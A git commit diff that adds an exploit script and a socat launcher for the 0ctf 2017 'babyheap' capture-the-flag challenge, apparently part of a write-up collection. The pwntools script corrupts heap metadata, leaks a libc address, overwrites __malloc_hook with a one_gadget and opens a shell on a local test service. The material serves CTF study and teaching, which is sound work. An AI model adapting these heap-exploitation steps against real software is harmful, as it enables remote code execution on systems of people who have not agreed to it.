finish 6.1.10

2025-06-24 04:05:03 +07:00 · 2018-01-10 17:35:17 +08:00
parent 6cebda926b
commit 3e78d24086
5 changed files with 6026 additions and 0 deletions
--- a/src/Others/1.5.8_glibc_malloc/malloc-2.23.c
+++ b/src/Others/1.5.8_glibc_malloc/malloc-2.23.c
--- a/src/writeup/6.1.10_0ctf2017_babyheap2017/exp.py
+++ b/src/writeup/6.1.10_0ctf2017_babyheap2017/exp.py
@ -0,0 +1,104 @@
+from pwn import *
+
+io = remote('127.0.0.1', 10001)
+
+def alloc(size):
+    io.recvuntil("Command: ")
+    io.sendline('1')
+    io.recvuntil("Size: ")
+    io.sendline(str(size))
+
+def fill(idx, cont):
+    io.recvuntil("Command: ")
+    io.sendline('2')
+    io.recvuntil("Index: ")
+    io.sendline(str(idx))
+    io.recvuntil("Size: ")
+    io.sendline(str(len(cont)))
+    io.recvuntil("Content: ")
+    io.send(cont)
+
+def free(idx):
+    io.recvuntil("Command: ")
+    io.sendline('3')
+    io.recvuntil("Index: ")
+    io.sendline(str(idx))
+
+def dump(idx):
+    io.recvuntil("Command: ")
+    io.sendline('4')
+    io.recvuntil("Index: ")
+    io.sendline(str(idx))
+    io.recvuntil("Content: \n")
+    data = io.recvline()
+    return data
+
+alloc(0x10)
+alloc(0x10)
+alloc(0x10)
+alloc(0x10)
+alloc(0x80)
+#fill(0, "A"*16)
+#fill(1, "A"*16)
+#fill(2, "A"*16)
+#fill(3, "A"*16)
+#fill(4, "A"*128)
+
+free(1)
+free(2)
+
+payload  = "A"*16
+payload += p64(0)
+payload += p64(0x21)
+payload += p64(0)
+payload += "A"*8
+payload += p64(0)
+payload += p64(0x21)
+payload += p8(0x80)
+fill(0, payload)
+
+payload  = "A"*16
+payload += p64(0)
+payload += p64(0x21)
+fill(3, payload)
+
+alloc(0x10)
+alloc(0x10)
+#fill(1, "B"*16)
+#fill(2, "C"*16)
+#fill(4, "D"*16)
+
+payload  = "A"*16
+payload += p64(0)
+payload += p64(0x91)
+fill(3, payload)
+
+alloc(0x80)
+#fill(5, "A"*128)
+
+free(4)
+
+leak = u64(dump(2)[:8])
+libc = leak - 0x3c4b78          # 0x3c4b78 = leak - libc
+__malloc_hook = libc + 0x3c4b10    # readelf -s libc.so.6 | grep __malloc_hook@
+one_gadget = libc + 0x4526a
+log.info("leak => 0x%x" % leak)
+log.info("libc => 0x%x" % libc)
+log.info("__malloc_hook => 0x%x" % __malloc_hook)
+log.info("one_gadget => 0x%x" % one_gadget)
+
+alloc(0x60)
+free(4)
+
+payload = p64(libc + 0x3c4afd)
+fill(2, payload)
+
+alloc(0x60)
+alloc(0x60)
+
+payload  = p8(0)*3
+payload += p64(one_gadget)
+fill(6, payload)
+
+alloc(1)
+io.interactive()
--- a/src/writeup/6.1.10_0ctf2017_babyheap2017/run.sh
+++ b/src/writeup/6.1.10_0ctf2017_babyheap2017/run.sh
@ -0,0 +1 @@
+socat tcp4-listen:10001,reuseaddr,fork exec:./babyheap &
				`@ -0,0 +1 @@`
				`socat tcp4-listen:10001,reuseaddr,fork exec:./babyheap &`